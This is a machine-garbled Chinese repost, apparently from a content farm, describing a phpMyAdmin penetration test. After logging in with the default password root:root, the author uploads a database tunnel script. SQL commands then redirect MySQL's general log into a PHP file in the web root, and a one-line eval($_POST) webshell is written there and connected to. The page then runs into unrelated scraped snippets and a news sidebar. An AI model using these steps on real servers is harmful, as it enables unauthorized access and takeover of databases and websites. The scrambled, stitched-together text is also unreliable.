最近大家都在讨论2022年01月04日整理发布:分享Phpmyadmin的一次渗透测试相关的事情,对此小编也是非常的感应兴趣,那么这件事具体又是怎么回事呢?下面就是小编搜索到的关于2022年01月04日整理发布:分享Phpmyadmin的一次渗透测试事件的相关信息,我们一起来看看吧!
(资料图片)
我给大家讲一个分享Phpmyadmin的渗透测试。相信朋友们也应该很关心这个话题。现在,让我们来谈谈为我的朋友分享Phpmyadmin的渗透测试。边肖还收集了关于共享Phpmyadmin渗透测试的相关信息。我希望你看到后会喜欢。
下面,phpmyadmin教程栏目将介绍一个Phpmyadmin的渗透测试,希望对有需要的朋友有所帮助!
首先对某站进行了目录扫描,发现phpmyadmin尝试了弱密码root:root幸运的进入
尝试使用Navicate连接到数据库会返回禁止远程连接到数据库:
但是,当远程命令执行发现本地3306端口打开时,它会尝试通过代理进行连接:
将ntunnel_mysql.php文件(数据库的代理脚本)上传到Navicat安装目录中目标服务器的任何网站目录(稍后获取getshell后上传)
上传到D:/phpStudy/WWW目录进行访问。http://XXX/ntunnel_mysql.php测试成功。
进行测试连接:
(此时,打开Navicat在本地配置http连接,这里的通道地址会写你上面访问过的url,也就是说它是一个代理,在钩子上使用base64编码,防止waf从中捣乱,然后把localhost写成主机名,把账号密码写成lnmp01本地数据库用户的账号,因为需要连接lnmp01本地mysql)
Phpmyadmin获取外壳:
使用日志文件
MySQL及以上版本将创建日志文件。修改日志的全局变量也可以是getshell。但是您也应该拥有读写生成的日志的权限。
设置全局general _ log=" ON#当打开general时执行的sql语句将出现在WIN-30DFNC8L78A.log文件中。然后,如果general_log_file的值被修改,执行的sql语句将被相应地生成,然后getshell。
SET global general _ log _ file=" d :/phpStudy/WWW/test 1234 . PHP ";#映射将生成test1234.php文件。
选择?PHP eval($ _ POST[2019]);";#在test1234.php文件中写入一个单词特洛伊
斩波器连接:
以上是分享一个Phpmyadmin渗透测试的细节!
来源:php中文网站
下一篇:最后一页
《昆明市人民政府办公室关于推动公立医院高质量发展的实施方案》(以下简称《方案》)近日出台,明确了推进医疗资源扩容提质、推进医疗服务模
1、小龙虾的心脏在虾头。2、小龙虾的头不能吃,从健康角度来说,不建议吃虾的头部。虾的循环系统和呼吸系统和生殖系统都集中在头胸部,腹部可
1、通信地扯是什么意思呢,又该怎么填写呢,通信地址是指某人比较固定的较长时间生活和工作地扯。因现在人们活动范围扩大,工作
肺部结节是一种比较常见的肺部疾病之一,它是一种顽固性疾病,会影响到其他的一些器官,对身体的伤害很大,那么肺部结节是怎么形成的?学习啦小
1、你去百度查找冰山王爷的废妾,第一个出来的网站没有VIP章节,直接看。2、已经连载完了。本文到此分享完毕,希望对大家有
qq硬盘在哪里?让边肖告诉你。第一步,登录QQ软件。看到图中红色圈起来的图标了吗?这是应用程序管理器。进入应用管理器,我
总结是事后对某一阶段的工作或某项工作的完成情况,包括取得的成绩、存在的问题及得到的经验和教训加以回顾和分析,为今后的工作提供帮助和借
大众网·海报新闻记者吴军林解强民济南报道这段时间,ChatGPT火爆网络,它能否取代人力的话题也广受关注。2月8日
安全是目的,防范是手段,通过防范的手段达到或实现安全的目的,就是安全防范的基本内涵。这是学习啦小篇为大家整理的安全防范技术论文,仅供
1、football就是通常所说的football-FOOTBALL,所以不要以为FOOTBALL就是美式足球,美式英
X 关闭
2022年01月04日整理发布:分享Phpmyadmin的一次渗透测试 动态焦点
蔚来加码换电,现金流何以为继?|速看
王子文个子小却很有气质,官宣恋爱后更温柔了,私服高级也精致
当前速读:山楂树之恋歌词完整版百度文库_山楂树之恋歌词完整版
净利润连续3年为负,青海春天称持续发展能力不存在重大不确定性
全球通讯!共谋量子未来!中国移动研究院一行莅临考察玻色量子
X 关闭